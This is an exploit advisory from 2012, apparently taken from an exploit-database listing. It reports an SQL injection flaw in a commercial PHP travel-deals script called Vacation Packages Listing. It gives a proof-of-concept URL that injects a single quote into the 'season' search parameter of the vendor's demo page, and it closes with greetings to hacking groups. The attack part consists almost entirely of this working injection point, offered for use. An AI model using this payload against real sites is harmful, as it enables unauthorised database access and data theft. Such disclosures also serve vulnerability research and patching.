# Exploit Title:   VACATION PACKAGES LISTING Sql Injection
# Date: 19/03/2012
# Author: r45c4l
# Script url: http://www.classifiedsgeek.com/vacation-packages/
# Version: N/A
# CVE : ()
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Product Description :
Vacation packages listing is a PHP travel script & travel deals software for travel agencies and tour operators to manage dynamic vacation packages and travel deals.

Product Cost : $119.00
===============================Exploit=================================================
                                    ---ICW---
 [ EXPL0!T ]
 SQL Injection
 
 Note: Tested on demo site
 
 p0c - http://www.classifiedsgeek.com/vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2'
 
 
===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Hoody, sam, Sai Satish
            All members of ICW, AH, G4H and darkc0de and all Indian Hackers

Special Greetz to :  b4ltazar and s1nn3r


# Email: infosecpirate@gmail.com
                                    === End () ====